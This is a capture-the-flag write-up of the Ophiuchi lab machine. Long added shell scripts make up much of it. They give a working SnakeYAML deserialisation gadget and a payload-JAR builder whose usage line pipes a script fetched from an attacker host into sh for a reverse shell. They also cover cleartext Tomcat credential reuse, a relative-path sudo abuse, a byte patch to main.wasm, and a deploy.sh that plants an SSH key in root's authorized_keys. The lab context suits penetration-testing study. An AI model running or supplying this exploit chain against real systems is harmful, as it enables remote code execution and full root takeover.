Ophiuchi
Gaining Access
Nmap scan:
YAML Parser
Port 8080 was running an application that parses user-supplied YAML.
This is a classic deserialisation bug: a Java YAML parser resolves tags in the document to classes and instantiates them from untrusted input, so a crafted document can trigger code execution on the server. Googling for this led me to this repository.
Based on the PoC, we can first test whether the parser will reach out to our host by pointing the payload at a listener we control, using this script:
And it does indeed work: the callback arrives, which confirms both that the gadget fires and that the target can reach us.
We then need to use this bit of code to make the machine download a reverse shell and execute it.
After editing this code, we compile it and package it into a JAR file with these commands:
This produces a JAR file. We then serve it from our host and make the machine fetch it with the same YAML payload as above, this time pointing at the JAR. Loading the JAR triggers the command, and our listener receives a reverse shell as tomcat.
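The two stages described above, as an added example rather than the page's own script (that was not preserved here). It assumes the parser is SnakeYAML or another Java YAML parser that resolves !!java tags to classes, and uses the ScriptEngineManager gadget popularised by the artsploit yaml-payload PoC. The attacker URL, listener port and command are placeholders.

```sh
#!/bin/sh
# Added example, not the page's own script. Assumes the parser on 8080 is
# SnakeYAML (or another Java YAML parser that resolves !!java tags) and uses
# the ScriptEngineManager gadget from the artsploit/yaml-payload PoC.
# The attacker URL, the listener and the command are placeholders.

# The YAML that drives the gadget. Deserialising it builds a URLClassLoader
# over our URL; ScriptEngineManager then asks ServiceLoader for
# META-INF/services/javax.script.ScriptEngineFactory, which produces an HTTP
# request to us. With a directory URL (trailing slash) that request is the
# stage-1 probe; with a .jar URL the loader fetches the jar and instantiates
# the factory class named in it, which is stage 2.
gadget_yaml() {
    printf '%s\n' \
        '!!javax.script.ScriptEngineManager [' \
        '  !!java.net.URLClassLoader [[' \
        "    !!java.net.URL [\"$1\"]" \
        '  ]]' \
        ']'
}

# Stage-2 sources: the factory's constructor runs as soon as ServiceLoader
# instantiates it. $2 is the shell command to run (avoid double quotes in it;
# it is pasted into a Java string literal).
write_payload_src() {
    dir=$1; cmd=$2
    mkdir -p "$dir/src/artsploit" "$dir/src/META-INF/services"
    # ServiceLoader reads this file and instantiates the class it names.
    echo 'artsploit.AwesomeScriptEngineFactory' \
        > "$dir/src/META-INF/services/javax.script.ScriptEngineFactory"
    cat > "$dir/src/artsploit/AwesomeScriptEngineFactory.java" <<EOF
package artsploit;

import java.io.IOException;
import java.util.List;
import javax.script.ScriptEngine;
import javax.script.ScriptEngineFactory;

public class AwesomeScriptEngineFactory implements ScriptEngineFactory {
    public AwesomeScriptEngineFactory() {
        try {
            Runtime.getRuntime().exec(new String[]{"/bin/sh", "-c", "$cmd"});
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
    // The interface forces these; the constructor is the only part we need.
    public String getEngineName() { return null; }
    public String getEngineVersion() { return null; }
    public List<String> getExtensions() { return null; }
    public List<String> getMimeTypes() { return null; }
    public List<String> getNames() { return null; }
    public String getLanguageName() { return null; }
    public String getLanguageVersion() { return null; }
    public Object getParameter(String key) { return null; }
    public String getMethodCallSyntax(String o, String m, String... a) { return null; }
    public String getOutputStatement(String s) { return null; }
    public String getProgram(String... s) { return null; }
    public ScriptEngine getScriptEngine() { return null; }
}
EOF
}

# Compile and package. Use a JDK whose class-file version the target's JVM
# accepts (e.g. javac --release 8 on newer JDKs), or the class will not load.
build_jar() {
    dir=$1
    javac "$dir/src/artsploit/AwesomeScriptEngineFactory.java"
    jar -cvf "$dir/yaml-payload.jar" -C "$dir/src" .
}

# Usage (placeholders):
#   gadget_yaml 'http://10.10.14.2:8000/'                  # stage 1: expect a GET on our web server
#   write_payload_src ./payload 'curl http://10.10.14.2:8000/rev.sh | sh'
#   build_jar ./payload && (cd payload && python3 -m http.server 8000)
#   gadget_yaml 'http://10.10.14.2:8000/yaml-payload.jar'  # stage 2: submit to the parser
```

The stage-1 probe is worth keeping separate from the jar: a hit on the web server tells you the gadget chain works and the host has outbound access before you spend time on the callback shell, and a failed stage 2 is then almost always a class-version mismatch or a command that needs a different shell.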
Privilege Escalation
Tomcat Credentials
Since we are tomcat, we should look at the Tomcat configuration. The credentials for the manager interface are stored in cleartext in ~/conf/tomcat-users.xml.
We can try su to the admin user and find that the same password works there.
Sudo Privileges
Since we have the password, we can check for sudo privileges.
It seems we can run go on a certain script:
The deploy.sh it executes is referenced without an absolute path, so it is resolved from the directory we run the sudo command in, and we can supply our own script to get a root shell. However, before running it, the script checks main.wasm and only runs deploy.sh if that returns 1.
Running the script does not work no matter what for now, so let's investigate main.wasm. WASM is short for WebAssembly, and we can download and decompile the file here:
This lets us see the code that is present. Alternatively, we can use wasm-decompile (from the WABT toolkit) to read it; wasm-objdump -d from the same toolkit prints the byte offset of each instruction, which is useful for the patch below.
The above code does nothing but return 0, so we need to change that 0 to a 1. In the binary, i32.const 0 is encoded as the opcode byte 41 followed by the operand byte 00, so we can count the bytes up to that operand and overwrite it with 01 using dd.
Afterwards, we can create a deploy.sh file that appends our public key to /root/.ssh/authorized_keys and run the sudo command.
This allows us to SSH in as root.
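The whole privilege-escalation procedure (patch the wasm, write deploy.sh, run the sudo command) as an added example; these are not the page's own commands. It assumes the Go program run via sudo loads main.wasm and deploy.sh relative to the current directory and calls an exported function (named info here) that must return 1 before deploy.sh runs. The main.wasm used below is a constructed minimal module, not the box's file, so the offset it finds (35) is specific to that sample.

```sh
#!/bin/sh
# Added example, not the page's own commands. Assumptions: the Go program
# run via sudo loads main.wasm and deploy.sh relative to the current
# directory, and calls an exported function (named info here) that must
# return 1 before deploy.sh is executed with root's privileges.

# Constructed stand-in for main.wasm (the real file is larger): a minimal
# module exporting info: () -> i32 whose body is i32.const 0; end, i.e. the
# bytes 41 00 0b. Written with octal escapes so plain sh printf works.
make_sample_wasm() {
    printf '\000asm\001\000\000\000' > "$1"             # magic + version 1
    printf '\001\005\001\140\000\001\177' >> "$1"       # type 0: () -> i32
    printf '\003\002\001\000' >> "$1"                   # func 0 has type 0
    printf '\007\010\001\004info\000\000' >> "$1"       # export "info" = func 0
    printf '\012\006\001\004\000\101\000\013' >> "$1"   # body: i32.const 0; end
}

# Byte offset of the operand in the first byte-aligned "41 00 0b" sequence.
# Scanning per byte avoids matching the pattern across two unrelated bytes.
# On a real binary confirm the offset with: wasm-objdump -d main.wasm
find_const0_offset() {
    rest=$(od -A n -v -t x1 "$1" | tr -d ' \n'); pos=0
    while [ -n "$rest" ]; do
        case $rest in
            41000b*) echo $((pos + 1)); return 0 ;;
        esac
        rest=${rest#??}; pos=$((pos + 1))
    done
    return 1
}

# Overwrite the single operand byte with 01 so the function returns 1.
# conv=notrunc keeps the rest of the file; bs=1 makes seek count in bytes.
# An explicit offset (taken from wasm-objdump) may be passed as $2.
patch_wasm_info() {
    f=$1
    if [ -n "${2:-}" ]; then off=$2
    else off=$(find_const0_offset "$f") || { echo "pattern not found" >&2; return 1; }
    fi
    printf '\001' | dd of="$f" bs=1 seek="$off" count=1 conv=notrunc 2>/dev/null
    echo "$off"
}

# deploy.sh: appends our public key to root's authorized_keys. SSH_DIR can
# be overridden so the script can be dry-run as an unprivileged user.
write_deploy_sh() {
    cat > "$1" <<EOF
#!/bin/sh
d=\${SSH_DIR:-/root/.ssh}
mkdir -p "\$d" && chmod 700 "\$d"
echo '$2' >> "\$d/authorized_keys"
chmod 600 "\$d/authorized_keys"
EOF
    chmod +x "$1"
}

# Usage on the target (paths are placeholders):
#   mkdir /tmp/w && cd /tmp/w && cp /path/to/main.wasm .
#   patch_wasm_info main.wasm
#   write_deploy_sh deploy.sh 'ssh-ed25519 AAAA... you@kali'
#   sudo <the go command from sudo -l>   # runs deploy.sh as root once info() returns 1
#   ssh root@target
```

Patching one operand byte rather than rebuilding the module keeps every section length in the binary unchanged, which is why the file stays valid; anything that alters the code section's size would also require fixing the LEB128 size prefixes of the section and the function body.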